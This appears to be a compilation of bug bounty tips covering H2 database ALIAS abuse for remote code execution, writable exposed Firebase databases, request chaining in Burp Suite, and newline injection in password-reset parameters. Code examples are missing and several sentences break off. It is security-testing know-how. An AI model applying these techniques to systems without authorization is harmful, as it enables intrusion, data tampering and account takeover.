Creating an alias to execute system commands via Java Runtime
π Quick Analysis:
- Default oken validation
- H2 database exposed with unsafe configurations
- Ability to create custom ALIAS β leads to RCE
- No proper input validation or restriction on JDBC params
ο»Ώ
π§ Bug Bounty Tips:
- Always check hidden/internal endpoints like "/getSchema", "/actuator", "/env"
- Look for H2 / embedded DB usage β often misconfigured
- Try injecting JDBC params (INIT, TRACE, etc.)
- Donβt ignore default tokens or exposed headers
- Think beyond SQLi β DB features themselves can be weaponized

π Detailed Bug Bounty Tip: Publicly Exposed Firebase Config β Unauthorized Data Uploads
Found a juicy misconfiguration during a recon phase!
### Vulnerability:
Many web/mobile apps use Firebase Realtime Database (Google) and leave the configuration exposed in client-side JavaScript or source code. When the database security rules are not properly set (often left as default "true" for testing), anyone can read and write data without authentication.
This leads to unauthorized data injection, tampering, or even full database takeover.
### How to Test:
1. Hunt for Firebase config in JS files, source code, or APK (look for
2. Identify the database URL (usually `https://<project-id>.firebaseio.com`)
3. Test write access with a simple PUT request
### Exploitation Command:
Replace
Proof of Concept Result:
The database accepted the PUT request and stored the attacker-controlled JSON data.
### Impact:
- Data pollution / poisoning
- Injecting malicious content (e.g., XSS payloads, fake user data, phishing links)
- Potential account takeover or business logic abuse depending on how the app uses the data
- In severe cases β complete database compromise
### How to Report & Fix (for devs):
- Set proper Firebase Realtime Database Security Rules (deny read/write by default)
- Use Firebase Authentication
- Avoid exposing sensitive config in client-side code when possible
- Use Firestore with stricter rules instead (if applicable)
Pro Tip: Always check

β‘οΈBlind RCE via Chaining Requestsπ
one word for all:
"To exploit any high severity vulnerability you have to analyze and chain multiple request components"
How to approach chaining a bug:
β’ First open your target in burpsuite (disable browser extensions to reduce other requests)
β’ Brows the target maually as much possible (don't run automatic crawler do first manually)
β’ Turn off proxy and review porxy history and send all the imporetent requests in 'Organizer' tab
β’ Now play in repeater, and if you got anything interesting see the serial number of the request in proxy history
β’ For chaining with other request analyze after the request history (this will help you to understand whats your second step request now)
THIS IS HOW YOU CAN FIND CRITICAL BUGS BY CHAINING THEM

π¨Bug Bounty Tip: Test Newline Injection in JSON Parameters
When testing API endpoints, donβt assume parameters like
For password-reset functionality, try newline injection:
If the backend fails to properly validate or sanitize the parameter, it may interpret both email addresses as separate recipients and send the password-reset link to both accounts.
This can indicate a parameter parsing / input validation flaw and, depending on the application logic and impact, potentially lead to account-related security issues.
Things to test:
β’
β’ Multiple values in the same parameter
β’ JSON arrays vs. strings
β’ Duplicate JSON keys
β’ URL-encoded newline characters
β’ Different API content types
Always test only on systems youβre authorized to assess.
